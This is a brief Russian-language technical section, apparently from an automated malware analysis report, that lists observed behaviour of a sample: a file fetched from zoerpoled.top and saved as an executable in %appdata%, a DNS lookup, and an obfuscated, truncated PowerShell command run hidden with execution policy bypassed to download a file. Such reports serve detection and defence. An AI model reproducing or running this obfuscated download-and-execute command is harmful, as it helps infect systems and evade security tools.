Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^eR^s^He^LL^.ExE -^e^xeCu^Ti^OnP^oliCy^ by^PASS ^-^N^OPRo^Fi^L^E ^-w^indowstY^l^E HID^DEN (nE^w-o^BJe^Ct s^yS^tem^.neT^.^w^EB^c^l^iE^nt^)^.DOw^NLOAdf^ILe(^'http://www.zoerp...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "PO^W^eR^s^He^LL^.ExE -^e^xeCu^Ti^OnP^oliCy^ by^PASS ^-^N^OPRo^Fi^L^E ^-w^indowstY^l^E HID^DEN (nE^w-o^BJe^Ct s^yS^tem^.neT^.^w^EB^c^l^iE^nt^)^.DOw^NLOAdf^ILe(^'http://www.zoerp...' (со скрытым окном)